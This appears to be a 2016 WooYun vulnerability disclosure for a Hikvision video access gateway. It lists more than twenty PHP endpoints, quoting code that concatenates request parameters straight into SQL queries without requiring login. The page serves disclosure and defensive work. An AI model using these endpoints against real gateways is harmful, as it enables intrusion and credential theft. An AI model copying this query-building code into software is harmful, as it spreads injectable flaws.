当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0180213

漏洞标题:海康威视某视频接入网关系统漏洞集合(无需登录34处SQL注入&文件遍历&上传等)

相关厂商:海康威视

漏洞作者: YY-2012

提交时间:2016-03-02 19:54

修复时间:2016-06-04 10:00

公开时间:2016-06-04 10:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-02: 细节已通知厂商并且等待厂商处理中
2016-03-06: 厂商已经确认,细节仅向厂商公开
2016-03-09: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-04-30: 细节向核心白帽子及相关领域专家公开
2016-05-10: 细节向普通白帽子公开
2016-05-20: 细节向实习白帽子公开
2016-06-04: 细节向公众公开

简要描述:

rt

详细说明:

第一处注入:/userInfo/userInfo.php

<?php
	include('../common/connDb.php');
	include('roleInfoClass.php');
	$dbQuery = new DataBaseQuery();
	$isEmpty = empty($_GET['userId']);
	$userId = "";
	$name = "";
	$password = "******";
	$realName = "";
	$phone = "";
	$eMail = "";
	$roleId = "";
	$unitCode = "";
	if(!$isEmpty){
		$re = $dbQuery->query('select * from user_info where userId ='.$_GET['userId']);
		while ($row = $dbQuery->fetchArray($re)){
			$userId = $row['userId'];
			$name = $row['name'];
			//$password = $row['password'];
			$realName = $row['realName'];
			$phone = $row['phone'];
			$eMail = $row['eMail'];
			$roleId = $row['roleId'];
			$unitCode= $row['unitCode'];


第二处注入:/userInfo/roleInfo.php

<?php
	include('../common/connDb.php');
	$dbQuery = new DataBaseQuery();
	$isEmpty = empty($_GET['roleId']);
	$roleId = "";
	$name = "";
	$description = "";
	$menuIds = "";
	if(!$isEmpty){
		$re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
		while ($row = $dbQuery->fetchArray($re)){
			$roleId = $row['roleId'];
			$name = $row['name'];
			$description = $row['description'];
			$menuIds = $row['menuIds'];
		}
	}


第三处注入:/data/fetchRoleTreeJson.php

<?php
	include('../common/connDb.php');
	$type = $_GET['type'];
	$pNodeId = @$_GET['pNodeId'];
	$dbQuery = new DataBaseQuery();
	if($type=="main"){//取主菜单的树
		findAllMainMenuNode($dbQuery);
	}else{//取子菜单的树
		findAllSubMenuNode($dbQuery,$pNodeId);
	}
	class TreeNode{
	  var $id;
	  var $text;
	  var $iconCls;
	  var $state;
	  var $children=array();
	  function __construct(){
		
	  }
	  public function setId($id)
	  {
		$this->id = $id;
	  }
	  public function setText($text)
	  {
		$this->text = $text;
	  }
	   public function setIconCls($iconCls)
	  {
		$this->iconCls = $iconCls;
	  }
	   public function setState($state)
	  {
		$this->state = $state;
	  }
	   public function setChildren($children)
	  {
		$this->children = $children;
	  }
	   public function getId()
	  {
		return $this->id;
	  }
	  public function getText()
	  {
		return $this->text;
	  }
	   public function getIconCls()
	  {
		return $this->iconCls;
	  }
	   public function getState()
	  {
		return $this->state;
	  }
	   public function getChildren()
	  {
		return $this->children;
	  }
	
	}
	/**
		找出主菜单的树节点
	*/
	function findAllMainMenuNode($dbQuery){
		$jsonArray = array();
		$pNode = new TreeNode();
		$pNode->setId('0');
		$pNode->setText('主菜单');
		$pNode->setIconCls('icon-folder');
		array_push($jsonArray,$pNode);
		$re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
		while($row = $dbQuery->fetchArray($re)){
			$cNode = new TreeNode();
			$cNode->setId($row['menuId']);
			$cNode->setText($row['name']);
			$cNode->setIconCls('icon-systemMenu');
			if ($pNode->getChildren() != null) {
					$childrenArray = $pNode->getChildren();
					array_push($childrenArray,$cNode);
					$pNode->setChildren($childrenArray);
			}else{
					$childrenNodes = array();
					array_push($childrenNodes,$cNode);
					$pNode->setChildren($childrenNodes);
			}
		}
		print_r(json_encode($jsonArray));
		$dbQuery->closeDb();
	}
	/**
		找出子菜单的树节点
	*/
	function findAllSubMenuNode($dbQuery,$pNodeId){
		$jsonArray = array();
		$pNode = new TreeNode();
		$pNode->setId('0');
		$pNode->setText('子菜单');
		$pNode->setIconCls('icon-folder');
		array_push($jsonArray,$pNode);
		$re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单


第四处注入:/deviceConfig/configDeviceInfo.php

<?php
	include('../common/connDb.php');
	include('deviceTypeClass.php');
	$deviceId = $_GET['deviceId'];
	$dbQuery = new DataBaseQuery();
	$re = $dbQuery->query('select type_code,name from device_type_info');
	$deviceTypeArray = array(); //获取所有设备类型
	while ($row = $dbQuery->fetchArray($re)){
		$deviceType = new DeviceType($row['type_code'],$row['name']);
		array_push($deviceTypeArray,$deviceType);
	}
	$re = $dbQuery->query('select id,name from device_group_info');
	$groupArray = array();
	array_push($groupArray,new DeviceType("0","请选择"));
	while ($row = $dbQuery->fetchArray($re)){
		$deviceType = new DeviceType($row['id'],$row['name']);
		array_push($groupArray,$deviceType);
	}
	$type_code="";
	$network_addr="";
	$network_port="";
	$username="";
	$password="******";
	$indexcode="";
	$name="";
	$serial_num="";
	$analog_chan_count="";
	$digital_chan_count="";
	$alarm_in_count="";
	$alarm_out_count="";
	$audio_num="";
	$reg_type="";
	$group_id="";
	$allowShare="";
	$ctrl_unit_id ="";
	$re = $dbQuery->query('select * from device_info where id='.$deviceId);


第五处注入:/transformServer/serverConfigInfo.php

<?php
	include('../common/connDb.php');
	$dbQuery = new DataBaseQuery();
	$isEmpty = empty($_GET['transId']);
	$transId = "";
	$name = "";
	$transIp = "";
	$transPort = "";
	$transMax = "";
	$transType = "";
	if(!$isEmpty){
		$re = $dbQuery->query('select * from transform_server_info where transform_server_id ='.$_GET['transId']);


第六处注入:/cameraConfig/transferInfo.php

<?php
	include('../common/connDb.php');
	$dbQuery = new DataBaseQuery();
	$id = $_GET['id'];
	$src_audio_encode = "-1";
	$src_video_encode = "-1";
	$src_standard = "0";
	$src_stream_type = "0";
	$src_transform = "-1";
	$src_image_size = "1";
	$dst_audio_encode = "2";
	$dst_video_encode = "1";
	$dst_stream_type = "0";
	$dst_transform = "2";
	$dst_bitrate_type = "1";
	$dst_resolution = "3";
	$dst_video_bitrate = "19";
	$dst_framerate = "-1";
	$dst_interval_BPframe = "2";
	$dst_interval_Iframe = "30";
	$dst_pic_quality = "0";
	$transform_server_id = "";
	
	$re = $dbQuery->query('select * from camera_info where is_transform=1 and id ='.$id);
	while ($row = $dbQuery->fetchArray($re)){


第七处注入:/data/deviceAndCameraListData.php

include('../common/connDb.php');
		include('../common/unitCode.php');
		$dbQuery = new DataBaseQuery();
		$page=$_POST['page']; 
		$rows=$_POST['rows'];
		$sort=$_POST['sort'];
		$order=$_POST['order'];
		$start=($page -1)*$rows;
		$name=@$_POST['name'];
		$organize=@$_POST['organize'];
		$group=@$_POST['group'];
		$configFlag=@$_POST['configFlag'];
		$type=@$_GET['type'];
		$deviceIndexCode = @$_GET['deviceIndexCode'];
		$deviceId = @$_GET['deviceId'];
		$show = @$_GET['show'];
		if($type =="device"){
			$whereStr="";
			if($name != ""){
				if($name=="." || $name=="%" || $name=="_"){
					$name ="[".$name."]";
				}
				$whereStr =" and (d.name like '%".$name."%' or **.**.**.**work_addr like '%".$name."%')";
			}
			if($organize != ""){
				if($organize =="0"){ //如果是主控制中心则查询全部
				}else{
					if(strlen($organize)==8){//如果是派出所级别
						$whereStr =" and d.indexcode like '".$organize."%'";
					}else{
						$qxCode = substr($organize,4,2);
						$shiCode = substr($organize,2,2);
						$shengCode = substr($organize,0,2);
						if($shiCode=="00" && $qxCode=="00"){  //如果是省
							$whereStr =" and d.indexcode like '".$shengCode."%'";
						}else if($shiCode !="00" && $qxCode=="00"){  //如果是市
							$whereStr =" and d.indexcode like '".$shengCode.$shiCode."%'";
						}else{
							$whereStr =" and d.indexcode like '".$organize."%'";
						}
					}
					
				}	
			}
			if($group != ""){
				if($group=="-1"){
				}else{
					$whereStr =" and d.group_id =".$group;
				}	
			}
			$str="";
			if($configFlag == "1"){
				$str =" and (c.is_transform is null or c.is_transform=0)";
			}else if($configFlag == "2"){
				$str =" and (c.is_stream_transmit is null or c.is_stream_transmit=0)";
			}
			$re = $dbQuery->query('select distinct d.id,d.name,d.type_code,(select name from device_type_info where type_code = d.type_code) deviceType,d.reg_type regType,**.**.**.**work_addr networkAddr,**.**.**.**work_port networkPort,d.status,"device" type,d.indexcode,d.username,d.password from device_info d,camera_info c where d.indexcode=c.device_indexcode'.$unitWhere.$whereStr.$str.' order by d.'.$sort.' '.$order.' limit '.$start.','.$rows);
			$jsonArray = array();
			
			
			$count = $dbQuery->querySingle('select count(distinct d.id) from device_info d,camera_info c where d.indexcode=c.device_indexcode'.$unitWhere.$whereStr.$str);
			while ($row = $dbQuery->fetchArray($re)){
				$pNode = new TreeNode();


第8处注入:/data/deviceTypeData.php

<?php	
		include('../common/connDb.php');
		$dbQuery = new DataBaseQuery();
		$page=$_POST['page']; 
		$rows=$_POST['rows'];
		$start=($page -1)*$rows;
		$re = $dbQuery->query('select * from device_type_info limit '.$start.','.$rows);
		$count = $dbQuery->querySingle('select count(*) from device_type_info');
		$jsonStr ="";
		while ($row = $dbQuery->fetchArray($re)){
			$jsonStr = $jsonStr.json_encode($row).",";
		}
		if($jsonStr !=""){
			$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
		}
		$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
		$dbQuery->closeDb();
		echo ($str);
?>


第九处注入:/data/checkIsExist.php

<?php
	include('../common/connDb.php');
	$dbQuery = new DataBaseQuery();
	$object=$_POST['object'];
	if($object=="userInfo"){  //如果是校验用户名称
		$name=$_POST['name'];
		$userId=$_POST['userId'];
		checkUserName($dbQuery,$name,$userId);
	}else if($object=="roleInfo"){
		$name=$_POST['name'];
		$roleId=$_POST['roleId'];
		checkRoleName($dbQuery,$name,$roleId);
	}else if($object=="password"){
		$name=$_POST['name'];
		$password=$_POST['password'];
		checkPassword($dbQuery,$name,$password);
	}else if($object=="deviceGroup"){  //如果是校验用户名称
		$name=$_POST['name'];
		$groupId=$_POST['groupId'];
		checkGroupName($dbQuery,$name,$groupId);
	}
	function checkUserName($dbQuery,$name,$userId){
		$count = 0;
		if($userId ==""){
			$count = $dbQuery->querySingle('select count(*) from user_info where name="'.$name.'"');
		}else{
			$count = $dbQuery->querySingle('select count(*) from user_info where name="'.$name.'" and userId<>'.$userId);
		}	
		echo $count;
		$dbQuery->closeDb();
	}
	function checkRoleName($dbQuery,$name,$roleId){
		$count = 0;
		if($roleId ==""){
			$count = $dbQuery->querySingle('select count(*) from role_info where name="'.$name.'"');
		}else{
			$count = $dbQuery->querySingle('select count(*) from role_info where name="'.$name.'" and roleId<>'.$roleId);
		}	
		echo $count;
		$dbQuery->closeDb();
	}
	function checkPassword($dbQuery,$name,$password){
		$oldPassword = $dbQuery->querySingle('select password from user_info where name="'.$name.'"');
		if($password ==$oldPassword){
			echo 0;
		}else{
			echo 1;
		}
		$dbQuery->closeDb();
	}
	function checkGroupName($dbQuery,$name,$groupId){
		$count = 0;
		if($groupId ==""){
			$count = $dbQuery->querySingle('select count(*) from device_group_info where name="'.$name.'"');
		}else{
			$count = $dbQuery->querySingle('select count(*) from device_group_info where name="'.$name.'" and id<>'.$groupId);
		}	
		echo $count;
		$dbQuery->closeDb();
	}
?>


第十处注入:/data/fetchIoInfoData.php

<?php
	include('../common/connDb.php');
	include('../common/unitCode.php');
	$dbQuery = new DataBaseQuery();
	$page=$_POST['page'];
	$rows=$_POST['rows'];
	$sort=$_POST['sort'];
	$order=$_POST['order'];
	$start=($page -1)*$rows;
	$organize=@$_POST['organize'];
	$group=@$_POST['group'];
	$configFlag=@$_POST['configFlag'];
	
	$re = $dbQuery->query('select c.id,c.name,c.indexcode,d.name deviceName,**.**.**.**work_addr networkAddr,d.indexcode devIndexCode,d.type_code typeCode, c.globe_num from io_info c,device_info d where c.device_indexcode=d.indexcode order by c.id '.$order.' limit '.$start.','.$rows);
	$count = $dbQuery->querySingle('select count(*) from io_info c,device_info d where c.device_indexcode=d.indexcode');
	$jsonStr ="";
	while ($row = $dbQuery->fetchArray($re)){
		$jsonStr = $jsonStr.json_encode($row).",";
	}
	if($jsonStr !=""){
		$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
	}
	$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
	$dbQuery->closeDb();
	echo ($str);
?>


第十一处:/data/saveDeviceType.php

<?php
include('../common/connDb.php');
$operate=$_POST['operate'];
$typeCodes = @$_POST['typeCodes'];
$typeCode= @$_POST['typeCode'];
$name= @$_POST['name'];
$manufacturer= @$_POST['manufacturer'];
$registerType= @$_POST['registerType'];
$accessType= @$_POST['accessType'];
$equipmentType= @$_POST['equipmentType'];
$otherMan= @$_POST['otherMan'];
$port= @$_POST['port'];
if($operate=="delete"){  //如果是删除操作
	deleteDeviceType($typeCodes);
}else if($operate=="add"){ //如果是增加操作
	saveDeviceType($typeCode,$name,$manufacturer,$registerType,$accessType,$equipmentType,$otherMan,$port);
}else{  //如果是修改操作
	updateDeviceType($typeCode,$name,$manufacturer,$registerType,$accessType,$equipmentType,$otherMan,$port);
}
function deleteDeviceType($typeCodes){
		$dbQuery = new DataBaseQuery();
		$typeCodeArray = explode(",",$typeCodes);
		$codes="";
		for($i=0;$i<count($typeCodeArray);$i++){
			$count = $dbQuery->querySingle('select count(*) from device_info where type_code='.$typeCodeArray[$i]);
			if($count==0){
				$codes .=$typeCodeArray[$i].","; 
			}
		}
		if(strlen($codes)>0){
			$codes = substr($codes,0,strlen($codes)-1);
		}
		$query = $dbQuery->execute("delete from device_type_info where type_code in(".$codes.")");
		if ($query) {
			echo $codes;
		}else{
			echo "0";
		}
		$dbQuery->closeDb();
}
function saveDeviceType($typeCode,$name,$manufacturer,$registerType,$accessType,$equipmentType,$otherMan,$port){
		$pulginId="";
		if($accessType=="GB28181" || $accessType=="E-home" || $accessType=="Onvif" || $accessType=="Pisa" || $accessType=="Hkp协议"){
			$pulginId="";
		}else{
			$pulginId=$accessType;
		}
		$dbQuery = new DataBaseQuery();
		date_default_timezone_set('PRC');
		$time = date('Y-m-d H:i:s',time());
		$query = $dbQuery->execute('insert into device_type_info(type_code,name,manufacturer,register_type,access_type,equipment_type,plugin_id,update_time,int_rev,str_rev) values('.$typeCode.',"'.$name.'","'.$manufacturer.'",'.$registerType.',"'.$accessType.'","'.$equipmentType.'","'.$pulginId.'","'.$time.'",'.$port.',"'.$otherMan.'")');
		if ($query) {
			echo $typeCode;
		}else{
			echo 0;
		}
		$dbQuery->closeDb();
		
}
function updateDeviceType($typeCode,$name,$manufacturer,$registerType,$accessType,$equipmentType,$otherMan,$port){
		$pulginId="";
		if($accessType=="GB28181" || $accessType=="E-home" || $accessType=="Onvif" || $accessType=="Pisa" || $accessType=="Hkp协议"){
			$pulginId="";
		}else{
			$pulginId=$accessType;
		}
		$dbQuery = new DataBaseQuery();
		date_default_timezone_set('PRC');
		$time = date('Y-m-d H:i:s',time());
		$query = $dbQuery->execute('update device_type_info set name="'.$name.'",manufacturer="'.$manufacturer.'",register_type='.$registerType.',access_type="'.$accessType.'",equipment_type="'.$equipmentType.'",plugin_id="'.$pulginId.'",update_time="'.$time.'",int_rev='.$port.',str_rev="'.$otherMan.'" where type_code='.$typeCode);
		if ($query) {
			echo $typeCode;
		}else{
			echo 0;
		}
		$dbQuery->closeDb();
}
?>


第十二处:/data/saveDecodeServer.php

<?php
include('../common/connDb.php');
$operate=$_POST['operate'];
if($operate=="delete"){  //如果是删除操作
	$transIds = $_POST['transIds'];
	deleteDecodeServer($transIds);
}else{  //如果是增加或者修改操作
	$isEmpty=empty($_POST['transId']);
	$name=$_POST['name'];
	$transIp=$_POST['transIp'];
	$transPort=$_POST['transPort'];
	$transMax=$_POST['transMax'];
	$transType=$_POST['transType'];
	if($isEmpty){
		saveDecodeServer($name,$transIp,$transPort,$transMax,$transType);
	}else{
		updateDecodeServer($_POST['transId'],$name,$transIp,$transPort,$transMax,$transType);
	}
	
}
function deleteDecodeServer($transIds){
		$dbQuery = new DataBaseQuery();
		$query = $dbQuery->execute("delete from transform_server_info where transform_server_id in(".$transIds.")");
		if ($query) {
			echo "0";
		}else{
			echo "1";
		}
		$dbQuery->closeDb();
}
function saveDecodeServer($name,$transIp,$transPort,$transMax,$transType){
		$dbQuery = new DataBaseQuery();
		date_default_timezone_set('PRC');
		$time = date('Y-m-d H:i:s',time());
		$query = $dbQuery->execute("insert into transform_server_info(transform_server_id,server_ip,server_port,name,trans_type,trans_max,update_time) values (NULL,'".$transIp."',".$transPort.",'".$name."',".$transType.",".$transMax.",'".$time."')");
		if ($query) {
			echo $dbQuery->lastInsertRowID();
		}else{
			echo 0;
		}
		$dbQuery->closeDb();
		
}
function updateDecodeServer($transId,$name,$transIp,$transPort,$transMax,$transType){
		$dbQuery = new DataBaseQuery();
		date_default_timezone_set('PRC');
		$time = date('Y-m-d H:i:s',time());
		$query = $dbQuery->execute("update transform_server_info set server_ip='".$transIp."',server_port=".$transPort.",name='".$name."',trans_type=".$transType.",trans_max=".$transMax.",update_time='".$time."' where transform_server_id=".$transId);
		if ($query) {
			echo $transId;
		}else{
			echo 0;
		}
		$dbQuery->closeDb();
}
?>


第十三处:/data/fetchGroup.php

<?php	
		/*
			根据id找出分组
		*/
		include('../common/connDb.php');
		$dbQuery = new DataBaseQuery();
		$groupId=$_POST['groupId'];
		$groupArray = $dbQuery->querySingleRow('select id,name from device_group_info where id='.$groupId,true);
		$dbQuery->closeDb();
		echo(json_encode($groupArray));
?>


第十四处:/data/login.php

<?php
	/**
		系统登录设置
	*/
	include('../common/connDb.php');
	$dbQuery = new DataBaseQuery();
	$userName =$_POST['userName'];
	$password =$_POST['password'];
	$system =$_POST['system'];
	$userInfo = $dbQuery->querySingleRow('select password,roleId,unitCode from user_info where name="'.$userName.'"',true);
	if(count($userInfo)==0){ //用户名不存在
		echo "1";
		$dbQuery->closeDb();
		return;
	}else{  //用户名存在


第十五处:/data/transferCamera.php

<?php
include('../common/connDb.php');
$ids=@$_POST['ids'];
$srcAudioType=$_POST['srcAudioType'];
$srcVideoType=$_POST['srcVideoType'];
$srcStandard=$_POST['srcStandard'];
$srcStreamType=$_POST['srcStreamType'];
$srcTransForm=$_POST['srcTransForm'];
$srcImageSize=$_POST['srcImageSize'];
$dstAudioType=$_POST['dstAudioType'];
$dstVideoType=$_POST['dstVideoType'];
$dstStreamType=$_POST['dstStreamType'];
$dstTransForm=$_POST['dstTransForm'];
$dstBitrateType=$_POST['dstBitrateType'];
$dstResolution=$_POST['dstResolution'];
$dstVideoBitrate=$_POST['dstVideoBitrate'];
$dstFramerate=$_POST['dstFramerate'];
$dstIntervalBPframe=$_POST['dstIntervalBPframe'];
$dstIntervalIframe=$_POST['dstIntervalIframe'];
$dstPicQuality=$_POST['dstPicQuality'];
$transId=$_POST['transId'];
$dbQuery = new DataBaseQuery();
$idArray = explode(",",$ids);
$cameraIds ="";
for($i=0;$i<count($idArray);$i++){
	$cameraIds .=$idArray[$i].",";
}
$cameraIds = substr($cameraIds,0,strlen($cameraIds)-1);
$query=$dbQuery->execute('update camera_info set is_transform=1,src_audio_encode='.$srcAudioType.',src_video_encode='.$srcVideoType.',src_standard='.$srcStandard.',src_transform='.$srcTransForm.',dst_audio_encode='.$dstAudioType.',dst_video_encode='.$dstVideoType.',dst_stream_type='.$dstStreamType.',dst_transform='.$dstTransForm.',dst_bitrate_type='.$dstBitrateType.',dst_resolution='.$dstResolution.',dst_video_bitrate='.$dstVideoBitrate.',dst_framerate='.$dstFramerate.',dst_interval_BPframe='.$dstIntervalBPframe.',dst_interval_Iframe='.$dstIntervalIframe.',dst_pic_quality='.$dstPicQuality.',transform_server_id='.$transId.' where id in('.$cameraIds.')');
if($query){
	echo "0";
}else{
	echo "1";
}
$dbQuery->closeDb();
?>


第十六处:/data/modifyPassword.php

<?php
	include('../common/connDb.php');
	$name=$_POST['name'];
	$modPassword=$_POST['modPassword'];
	$dbQuery = new DataBaseQuery();
	date_default_timezone_set('PRC');
	$time = date('Y-m-d H:i:s',time());
	$query = $dbQuery->execute("update user_info set password='".$modPassword."',updataTime='".$time."' where name='".$name."'");
	if ($query) {
		echo 0;
	}else{
		echo 1;
	}
	$dbQuery->closeDb();
?>


第十七处:/data/fetchDeviceByGroupId.php

<?php	
		include('../common/connDb.php');
		include('../common/unitCode.php');
		$dbQuery = new DataBaseQuery();
		$page=$_POST['page']; 
		$rows=$_POST['rows'];
		$sort=$_POST['sort'];
		$order=$_POST['order'];	
		$start=($page -1)*$rows;
		$groupId=@$_POST['groupId'];
		$queryStatus=@$_POST['queryStatus'];
		$name=@$_POST['name'];
		$whereStr="";
		if($queryStatus=="1"){
			$whereStr=$whereStr." and (d.is_shared is null or d.is_shared =1)";
		}
		if($name !=""){
			if($name=="." || $name=="%" || $name=="_"){
				$name ="[".$name."]";
			}
			$whereStr =$whereStr." and (d.name like '%".$name."%' or **.**.**.**work_addr like '%".$name."%')";
		}
		$re = $dbQuery->query('select d.id,d.name,(select name from device_type_info where type_code = d.type_code) deviceType,d.reg_type,**.**.**.**work_addr,**.**.**.**work_port,d.status,d.is_shared shared from device_info d where d.allow_share=0 and d.group_id='.$groupId.$unitWhere.$whereStr.' order by d.'.$sort.' '.$order.' limit '.$start.','.$rows);
		$count = $dbQuery->querySingle('select count(*) from device_info d where d.allow_share=0 and d.group_id='.$groupId.$unitWhere.$whereStr);
		$jsonStr ="";
		while ($row = $dbQuery->fetchArray($re)){
			$jsonStr = $jsonStr.json_encode($row).",";
		}
		if($jsonStr !=""){
			$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
		}
		$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
		$dbQuery->closeDb();
		echo ($str);
?>


第十八处:/data/deleteDeviceInfo.php

<?php
	include('../common/connDb.php');
	$deviceIds = @$_POST['deviceIds'];
	$dbQuery = new DataBaseQuery();
	$dbQuery->execute("delete from camera_info where device_id in(".$deviceIds.")");
	$dbQuery->execute("delete from device_info where id in(".$deviceIds.")");
	echo "0";
	$dbQuery->closeDb();
?>


第十九处:/data/modifyDeviceInfo.php

<?php
	include('../common/connDb.php');
	$deviceId = @$_POST['deviceId'];
	$register = @$_POST['register'];
	$typecode = @$_POST['typecode'];
	$addr = @$_POST['addr'];
	$port = @$_POST['port'];
	$username = @$_POST['username'];
	$password = @$_POST['password'];
	$password_old = @$_POST['password_old'];
	$groupId = @$_POST['groupId'];
	$oldAddr = @$_POST['oldAddr'];
	$oldPort = @$_POST['oldPort'];
	$allowShare = @$_POST['allowShare'];
	$dbQuery = new DataBaseQuery();
	date_default_timezone_set('PRC');
	$time = date('Y-m-d H:i:s',time());
	if($register=="4"){ //如果是主动注册
		$query = $dbQuery->execute('update device_info set type_code='.$typecode.',group_id='.$groupId.',allow_share='.$allowShare.',update_time="'.$time.'" where id='.$deviceId);
		if ($query) {
			echo $deviceId;
		}else{
			echo 0;
		}
	}else{
		//if($oldAddr != $addr || $oldPort != $port){//如果新的IP或端口不同于老的,则为新的设备,需要删除之前设备中的监控点
		//	$dbQuery->execute('delete from camera_info where device_id='.$deviceId);
		//}
		if($password != $password_old){
			$query = $dbQuery->execute('update device_info set type_code='.$typecode.',network_addr="'.$addr.'",network_port='.$port.',username="'.$username.'",password="'.$password.'",group_id='.$groupId.',allow_share='.$allowShare.',update_time="'.$time.'" where id='.$deviceId);
		}
		else{
			$query = $dbQuery->execute('update device_info set type_code='.$typecode.',network_addr="'.$addr.'",network_port='.$port.',username="'.$username.'",group_id='.$groupId.',allow_share='.$allowShare.',update_time="'.$time.'" where id='.$deviceId);
		}
		if ($query) {
			echo $deviceId;
		}else{
			echo 0;
		}
	}
	$dbQuery->closeDb();
?>


第二十处:/data/decodeServerData.php

<?php	
		include('../common/connDb.php');
		$dbQuery = new DataBaseQuery();
		$page=$_POST['page']; 
		$rows=$_POST['rows'];
		$start=($page -1)*$rows;
		$re = $dbQuery->query('select * from transform_server_info limit '.$start.','.$rows);
		$count = $dbQuery->querySingle('select count(*) from transform_server_info');
		$jsonStr ="";
		while ($row = $dbQuery->fetchArray($re)){
			$jsonStr = $jsonStr.json_encode($row).",";
		}
		if($jsonStr !=""){
			$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
		}
		$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
		$dbQuery->closeDb();
		echo ($str);
?>


第二十一处:/data/userInfoData.php

<?php	
		include('../common/connDb.php');
		$dbQuery = new DataBaseQuery();
		$page=$_POST['page']; 
		$rows=$_POST['rows'];
		$start=($page -1)*$rows;
		$re = $dbQuery->query('select * from user_info limit '.$start.','.$rows);
		$count = $dbQuery->querySingle('select count(*) from user_info');
		$jsonStr ="";
		while ($row = $dbQuery->fetchArray($re)){
			$row['unitCode']=fetchUnitName($row['unitCode']);
			$jsonStr = $jsonStr.json_encode($row).",";
		}


第二十二处:/data/checkDevice.php

<?php
	include('../common/connDb.php');
	$dbQuery = new DataBaseQuery();
	$type=$_POST['type'];
	if($type=="singleIp"){  //如果是单IP设备添加
		$singleIp_addr=$_POST['singleIp_addr'];
		$singleIp_port=$_POST['singleIp_port'];
		checkSingleIp($dbQuery,$singleIp_addr,$singleIp_port);
	}else if($type=="ipDomain"){ //如果是IP段设备添加
		$ipDomain_startIp=$_POST['ipDomain_startIp'];
		$ipDomain_endIp=$_POST['ipDomain_endIp'];
		$ipDomain_port=$_POST['ipDomain_port'];
		checkIpDomain($dbQuery,$ipDomain_startIp,$ipDomain_endIp,$ipDomain_port);
	}else if($type=="singleCode"){//如果是单编号设备添加
		$singleCode_indexcode=$_POST['singleCode_indexcode'];
		checkSingleCode($dbQuery,$singleCode_indexcode);
	}else{//如果是编号段设备添加
		$codeDomain_preIndexCode=$_POST['codeDomain_preIndexCode'];
		$codeDomain_startCode=$_POST['codeDomain_startCode'];
		$codeDomain_endCode=$_POST['codeDomain_endCode'];
		checkCodeDomain($dbQuery,$codeDomain_preIndexCode,$codeDomain_startCode,$codeDomain_endCode);
	}
	function checkSingleIp($dbQuery,$singleIp_addr,$singleIp_port){
		$count = $dbQuery->querySingle('select count(*) from device_info where network_addr="'.$singleIp_addr.'" and network_port='.$singleIp_port);
		echo $count;
		$dbQuery->closeDb();
	}


第二十三处:/data/deviceListData.php

<?php	
		include('../common/connDb.php');
		include('../common/unitCode.php');
		$dbQuery = new DataBaseQuery();
		$page=$_POST['page']; 
		$rows=$_POST['rows'];
		$sort=$_POST['sort'];
		$order=$_POST['order'];	
		$start=($page -1)*$rows;
		$name=@$_POST['name'];
		$organize=@$_POST['organize'];
		$group=@$_POST['group'];
		$whereStr="";
		if($name != ""){
			if($name=="." || $name=="%" || $name=="_"){
				$name ="[".$name."]";
			}
			$whereStr =" and (d.name like '%".$name."%' or **.**.**.**work_addr like '%".$name."%')";
		}
		if($organize != ""){
			if($organize =="0"){ //如果是主控制中心则查询全部
			}else{
				if(strlen($organize)==8){//如果是派出所级别
					$whereStr =" and d.indexcode like '".$organize."%' and d.ctrl_unit_id<>1";
				}else{
					$qxCode = substr($organize,4,2);
					$shiCode = substr($organize,2,2);
					$shengCode = substr($organize,0,2);
					if($shiCode=="00" && $qxCode=="00"){  //如果是省
						$whereStr =" and d.indexcode like '".$shengCode."%' and d.ctrl_unit_id<>1";
					}else if($shiCode !="00" && $qxCode=="00"){  //如果是市
						$whereStr =" and d.indexcode like '".$shengCode.$shiCode."%' and d.ctrl_unit_id<>1";
					}else{
						$whereStr =" and d.indexcode like '".$organize."%' and d.ctrl_unit_id<>1";
					}
				}
				
			}	
		}
		if($group != ""){
			if($group=="-1"){
			}else{
				$whereStr =" and d.group_id =".$group;
			}	
		}
		$re = $dbQuery->query('select d.id,d.indexcode,d.dev_guid devGuid,d.name,(select name from device_type_info where type_code = d.type_code) deviceType,d.reg_type,**.**.**.**work_addr,**.**.**.**work_port,d.analog_chan_count,d.digital_chan_count,d.alarm_in_count,d.alarm_out_count,(select name from device_group_info where id=d.group_id) groupName,d.status,d.type_code typeCode from device_info d where 1=1 '.$unitWhere.$whereStr.' order by '.$sort.' '.$order.' limit '.$start.','.$rows);
		//echo 'select d.id,d.indexcode,d.dev_guid devGuid,d.name,(select name from device_type_info where type_code = d.type_code) deviceType,d.reg_type,**.**.**.**work_addr,**.**.**.**work_port,d.analog_chan_count,d.digital_chan_count,d.alarm_in_count,d.alarm_out_count,(select name from device_group_info where id=d.group_id) groupName,d.status,d.type_code typeCode from device_info d where 1=1 '.$unitWhere.$whereStr.' order by '.$sort.' '.$order.' limit '.$start.','.$rows;
		$count = $dbQuery->querySingle('select count(*) from device_info d where 1=1'.$unitWhere.$whereStr);
		$jsonStr ="";
		while ($row = $dbQuery->fetchArray($re)){
			$jsonStr = $jsonStr.json_encode($row).",";
		}
		if($jsonStr !=""){
			$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
		}
		$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
		$dbQuery->closeDb();
		echo ($str);
?>


第二十四处:/data/saveUserInfo.php

<?php
include('../common/connDb.php');
$operate=$_POST['operate'];
if($operate=="delete"){  //如果是删除操作
	$userIds = $_POST['userIds'];
	deleteUserInfo($userIds);
}else{  //如果是增加或者修改操作
	$isEmpty=empty($_POST['userId']);
	$name=$_POST['name'];
	$password = $_POST['password'];
	$password_old = @$_POST['password_old'];
	$realName = $_POST['realName'];
	$phone = $_POST['phone'];
	$eMail = $_POST['eMail'];
	$roleId = $_POST['roleId'];
